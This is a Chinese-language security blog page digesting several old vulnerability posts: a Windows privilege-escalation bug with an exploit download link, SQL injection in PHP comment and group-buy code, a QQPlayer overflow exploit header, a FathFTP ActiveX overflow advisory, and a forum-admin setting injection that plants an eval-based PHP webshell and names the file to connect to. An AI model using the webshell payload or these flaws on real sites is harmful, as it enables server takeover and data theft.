说明:今年的blackhat大会上提出来的,同时给出了源代码。
影响:貌似影响了Windows全部系统,演讲时讲的是Vista和Win7,貌似80sec给出了一个Windows 2003也可以利用 。
引用:
Source:
http://www.securityfocus.com/bid/42269/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will result in the complete compromise of affected computers.
Code:
http://www.exploit-db.com/sploits/Chimichurri-CVE-2010-2554.zip
阅读全文…
漏洞原因:
安装程序中的/comment/include/comment.class.php中关于function ajaxupdate($field, $id) 函数没有对参数进行过滤,在紧接着下面的数据库操作中引起了漏洞的发生。
原始代码:
function ajaxupdate( $field, $id )
{
$sql = “UPDATE $this->_comment_table SET {$field} = {$field} +1 WHERE `commentid` = ‘$id’ “;
$this->db->query($sql);
$sql2 = “SELECT {$field} FROM $this->_comment_table WHERE `commentid` = ‘$id’ “;
return $this->db->get_one($sql2);
From: exploit-db
#!/usr/bin/env python
#################################################################
#
# Title: QQPlayer cue File Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.qq.com
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQPlayer 2.3.696.400
# Vulnerable: QQPlayer<=2.3.696.400p1
#
#################################################################
阅读全文…
From: linux520
常规设置:站点地址和管理员邮箱处插入代码
站点地址:http://”””””””<?php eval($_POST[cmd])?>””””””””””’\\
管理员邮箱:”””””””<?php eval($_POST[cmd])?>””””””””””’\\
提交一句话连接:data\bbscache\admin_record.php
From: sebug
FathFTP ActiveX控件GetFromURL和RasIsConnected调用栈溢出漏洞
影响版本:FathFTP ActiveX 1.7
漏洞描述:
CVE ID: CVE-2010-2701
FathFTP是Windows开发人员可使用的FTP客户端和FTP服务器ActiveX/COM组件。
FathFTP ActiveX控件没有正确地验证提交给GetFromURL或RasIsConnected方式的输入参数,用户受骗访问了恶意网页并向上述方式传送了超长参数就可以触发栈溢出,导致执行任意代码。 阅读全文…
From: t00ls
by:k4shifz
app\groupbuy.app.php:26:
function index()
{
$id = empty($_GET['id']) ? 0 : $_GET['id']; //id未过滤
if (!$id)
{
$this->show_warning(‘no_such_groupbuy’);
return false;
} 阅读全文…
最新评论